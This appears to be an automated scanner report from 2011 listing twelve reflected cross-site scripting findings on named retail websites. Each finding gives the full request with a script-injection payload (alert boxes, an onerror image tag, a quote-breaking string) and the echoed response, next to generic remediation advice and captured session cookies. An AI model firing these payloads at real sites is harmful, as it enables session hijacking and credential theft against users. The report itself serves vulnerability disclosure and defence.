XSS, Cross Site Scripting, CWE-79, CAPEC-86, HSNi HTTP Systems

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.ballarddesigns.com/TopNav [storeId parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ballarddesigns.com
Path:	/TopNav

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload db5d1<script>alert(1)</script>ea5670adb7d was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TopNav?storeId=10052db5d1<script>alert(1)</script>ea5670adb7d&catalogId=10551&langId=-1 HTTP/1.1
Host: www.ballarddesigns.com
Proxy-Connection: keep-alive
Referer: http://www.ballarddesigns.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000gxw1tn9ZTw1KirZuRLdCeON:159jqb400; WC_PERSISTENT=00eJGahvFmoQOK4MJmQ96nf3Mlk%3d%0a%3b2011%2d03%2d02+13%3a31%3a29%2e926%5f1299090689926%2d6343%5f0; WCX_SOURCECODE=10121|ICAT|WEBOFFER|6379247|4000000000000000002

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:31:46 GMT
Server: IBM_HTTP_Server
Vary: Host,Accept-Encoding,User-Agent
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10052db5d1<script>alert(1)</script>ea5670adb7d"".</TD>
...[SNIP]...

1.2. http://www.ballarddesigns.com/webapp/wcs/stores/servlet/MiniCartView [storeId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ballarddesigns.com
Path:	/webapp/wcs/stores/servlet/MiniCartView

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload fea20<script>alert(1)</script>d61431d0dd5 was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/wcs/stores/servlet/MiniCartView?ts=12990907235740.27411083644255996&storeId=10052fea20<script>alert(1)</script>d61431d0dd5&catalogId=10551&langId=-1&orderId=. HTTP/1.1
Host: www.ballarddesigns.com
Proxy-Connection: keep-alive
Referer: http://www.ballarddesigns.com/wcsstore/CornerStoneBrands/GWT/B9720B9EE27B9CD7609AC1539BCFEFDC.cache.html
Pragma: no-cache
Content-type: application/x-www-form-urlencoded
Cache-Control: no-store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000gxw1tn9ZTw1KirZuRLdCeON:159jqb400; WC_PERSISTENT=00eJGahvFmoQOK4MJmQ96nf3Mlk%3d%0a%3b2011%2d03%2d02+13%3a31%3a29%2e926%5f1299090689926%2d6343%5f0; WCX_SOURCECODE=10121|ICAT|WEBOFFER|6379247|4000000000000000002

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:31:52 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10052fea20<script>alert(1)</script>d61431d0dd5"".</TD>
...[SNIP]...

1.3. http://www.garnethill.com/OrderStatusView [storeId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.garnethill.com
Path:	/OrderStatusView

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload d6495<script>alert(1)</script>f7bfb5aed10 was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /OrderStatusView?storeId=10054d6495<script>alert(1)</script>f7bfb5aed10&catalogId=10054&langId=-1 HTTP/1.1
Host: www.garnethill.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000J0w_Yt7uJ5MGsxuNjLunwJ9:14ul671lg; WC_PERSISTENT=n1%2bhkibr%2bz6Ycul2TJJsi6IQysI%3d%0a%3b2011%2d03%2d02+13%3a31%3a37%2e734%5f1299090697734%2d5352%5f0; WCX_SOURCECODE=190101|K1WBRS3|1K3|17592930|4000000000000017653; __utmz=252195359.1299090725.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252195359.1503553763.1299090725.1299090725.1299090725.1; __utmc=252195359

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:18:39 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000pzxMYLLw0Zrw5yz64H3N8No:14ul671lg; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10054d6495<script>alert(1)</script>f7bfb5aed10"".</TD>
...[SNIP]...

1.4. http://www.garnethill.com/TopNav [storeId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.garnethill.com
Path:	/TopNav

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload d1f09<script>alert(1)</script>9f3895f7835 was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TopNav?storeId=10054d1f09<script>alert(1)</script>9f3895f7835&catalogId=10054&langId=-1 HTTP/1.1
Host: www.garnethill.com
Proxy-Connection: keep-alive
Referer: http://www.garnethill.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000J0w_Yt7uJ5MGsxuNjLunwJ9:14ul671lg; WC_PERSISTENT=n1%2bhkibr%2bz6Ycul2TJJsi6IQysI%3d%0a%3b2011%2d03%2d02+13%3a31%3a37%2e734%5f1299090697734%2d5352%5f0; WCX_SOURCECODE=190101|K1WBRS3|1K3|17592930|4000000000000017653

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:31:46 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10054d1f09<script>alert(1)</script>9f3895f7835"".</TD>
...[SNIP]...

1.5. http://www.garnethill.com/UserLogonView [storeId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.garnethill.com
Path:	/UserLogonView

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload df2c7<script>alert(1)</script>47d161d7f9b was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /UserLogonView?storeId=10054df2c7<script>alert(1)</script>47d161d7f9b&catalogId=10054&langId=-1 HTTP/1.1
Host: www.garnethill.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCX_SOURCECODE=190101|K1WBRS3|1K3|17592930|4000000000000017653; __utmz=252195359.1299090725.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252195359.1503553763.1299090725.1299090725.1299090725.1; __utmc=252195359; JSESSIONID=0000bICDuqNPXIW-gqzv9CyH_dU:14ul671lg; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yNlh1C7ZuUiEyr9NoS%2bROgOuNn8%3d%0a%3b2011%2d03%2d02+14%3a11%3a00%2e68%5f1299090697734%2d5352%5f10054%5f%2d1002%2c%2d1%2cUSD%5f10054; WC_ACTIVEPOINTER=%2d1%2c10054; WC_USERACTIVITY_-1002=%2d1002%2c10054%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czFd3XkeWCbDbUPaac19fkp81Jd8isRkpw8MTbMgkCPSMwaJimjazomTIM4W2CbuckS7T%2bycJAGKq%0aDlKEBGcjs8SfLQsQJAMMl0q8TZv6rReMpKPR7AGyac7dg3V2i5t96RFZodKSh%2bE%3d; WC_GENERIC_ACTIVITYDATA=[54658884%3atrue%3afalse%3a0%3aDCeRByZZg9s%2f%2b%2bnUGYFpUfVq3j4%3d][com.ibm.commerce.context.base.BaseContext|10054%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10054%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10011%2610011%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:18:47 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10054df2c7<script>alert(1)</script>47d161d7f9b"".</TD>
...[SNIP]...

1.6. http://www.garnethill.com/webapp/wcs/stores/servlet/MiniCartView [storeId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.garnethill.com
Path:	/webapp/wcs/stores/servlet/MiniCartView

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload db8cf<script>alert(1)</script>1c545e65e55 was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/wcs/stores/servlet/MiniCartView?ts=12990907466490.4178177223075181&storeId=10054db8cf<script>alert(1)</script>1c545e65e55&catalogId=10054&langId=-1&orderId=. HTTP/1.1
Host: www.garnethill.com
Proxy-Connection: keep-alive
Referer: http://www.garnethill.com/wcsstore/CornerStoneBrands/GWT/0B2050845634C696A330F1EA28A9C008.cache.html
Pragma: no-cache
Content-type: application/x-www-form-urlencoded
Cache-Control: no-store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000J0w_Yt7uJ5MGsxuNjLunwJ9:14ul671lg; WC_PERSISTENT=n1%2bhkibr%2bz6Ycul2TJJsi6IQysI%3d%0a%3b2011%2d03%2d02+13%3a31%3a37%2e734%5f1299090697734%2d5352%5f0; WCX_SOURCECODE=190101|K1WBRS3|1K3|17592930|4000000000000017653; __utmz=252195359.1299090725.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252195359.1503553763.1299090725.1299090725.1299090725.1; __utmc=252195359; __utmb=252195359.1.10.1299090725

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:32:27 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10054db8cf<script>alert(1)</script>1c545e65e55"".</TD>
...[SNIP]...

1.7. http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.smithandnoble.com
Path:	/webapp/wcs/stores/servlet/TopCategoriesDisplay

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 1cbfb--><img%20src%3da%20onerror%3dalert(1)>df55a283985 was submitted in the REST URL parameter 5. This input was echoed as 1cbfb--><img src=a onerror=alert(1)>df55a283985 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/TopCategoriesDisplay1cbfb--><img%20src%3da%20onerror%3dalert(1)>df55a283985?storeId=10101&catalogId=10101 HTTP/1.1
Host: www.smithandnoble.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:32:05 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=000099CPWfGsNpuvZ8uLiXPtCqD:14t9ggoap; Path=/
Set-Cookie: WC_PERSISTENT=UcDLu0miXXfeAd0pxY8l6rlXA5E%3d%0a%3b2011%2d03%2d02+13%3a32%3a05%2e749%5f1299090725749%2d8050%5f0; Expires=Fri, 01 Apr 2011 18:32:04 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 35782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>
   Generic Error
   </title>
   <link rel="stylesheet"
...[SNIP]...
rce system, and check the log file.Exception Type:0Message Key:_ERR_CMD_CMD_NOT_FOUNDMessage:CMN3101E The system is unavailable due to "CMN0203E".System Message:Command not found: "TopCategoriesDisplay1cbfb--><img src=a onerror=alert(1)>df55a283985".Originating Command:Corrective Action:

       //*
       //********************************************************************
       -->
...[SNIP]...

1.8. http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay [storeId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.smithandnoble.com
Path:	/webapp/wcs/stores/servlet/TopCategoriesDisplay

Issue detail

The value of the storeId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f09cb'%3balert(1)//42650ca526b was submitted in the storeId parameter. This input was echoed as f09cb';alert(1)//42650ca526b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/wcs/stores/servlet/TopCategoriesDisplay?storeId=10101f09cb'%3balert(1)//42650ca526b&catalogId=10101 HTTP/1.1
Host: www.smithandnoble.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:31:51 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ZGCSXkDaeQrvVfAYQQa-jqw:14t9i3dnb; Path=/
Set-Cookie: WC_PERSISTENT=rQgsEXXsi%2bDfXm%2fCod3voG%2fxvSk%3d%0a%3b2011%2d03%2d02+13%3a31%3a51%2e108%5f1299090711108%2d3253%5f0; Expires=Fri, 01 Apr 2011 18:31:50 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1620

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>
       Generic Application Error Test JSP (Item)
   </title>
   <script type = "text/javascript" language="javascript" src="/wcsstore/Smi
...[SNIP]...
pt">
       if (window.location.hostname == 'www.smithandnoble.com') {
           cmSetProduction();
       }
       cmCreateErrorTag('http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay?storeId=10101f09cb';alert(1)//42650ca526b&catalogId=10101','http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay?storeId=10101f09cb';alert(1)//42650ca526b&catalogId=10101');
   </script>
...[SNIP]...

1.9. http://www.territoryahead.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 91103--><script>alert(1)</script>2be08184f36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico91103--><script>alert(1)</script>2be08184f36 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; CoreID6=82806333286612990907467&ci=90232094; PS_ALL=%23ps_catid%7EHome; 90232094_clogin=l=1299090746&v=1&e=1299092547893

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:43:31 GMT
Server: Apache
ETag: "AAAAS531FEm"
Last-Modified: Wed, 02 Mar 2011 18:28:46 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
i=90232094; PS_ALL=%23ps_catid%7EHome; 90232094_clogin=l=1299090746&v=1&e=1299092547893
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: SiQ6nawSrSgAAF3NFnAAAAAd
REDIRECT_SCRIPT_URL: /favicon.ico91103--><script>alert(1)</script>2be08184f36
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/favicon.ico91103-->
...[SNIP]...

1.10. http://www.territoryahead.com/includes/cleartext.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/cleartext.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 23442--><script>alert(1)</script>75d5204bd9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes23442--><script>alert(1)</script>75d5204bd9a/cleartext.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:52 GMT
Server: Apache
ETag: "AAAAS53+ij1"
Last-Modified: Wed, 02 Mar 2011 19:10:06 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3ffJmawSrSgAAGQksawAAAAa
REDIRECT_SCRIPT_URL: /includes23442--><script>alert(1)</script>75d5204bd9a/cleartext.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes23442-->
...[SNIP]...

1.11. http://www.territoryahead.com/includes/cleartext.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/cleartext.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload dc4aa--><script>alert(1)</script>727cf567a8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/cleartext.jsdc4aa--><script>alert(1)</script>727cf567a8d HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:46 GMT
Server: Apache
ETag: "AAAAS53+jOA"
Last-Modified: Wed, 02 Mar 2011 19:10:09 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
e: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vXMQyqwSrRQAAHa3-jAAAAAB
REDIRECT_SCRIPT_URL: /includes/cleartext.jsdc4aa--><script>alert(1)</script>727cf567a8d
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/includes/cleartext.jsdc4aa-->
...[SNIP]...

1.12. http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/includes/cm/cmtaggingservices_TTA_top.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload cd1bc--><script>alert(1)</script>6e9c8a53a22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includescd1bc--><script>alert(1)</script>6e9c8a53a22/cm/cmtaggingservices_TTA_top.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:34 GMT
Server: Apache
ETag: "AAAAS53+7iR"
Last-Modified: Wed, 02 Mar 2011 19:11:48 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
0.3
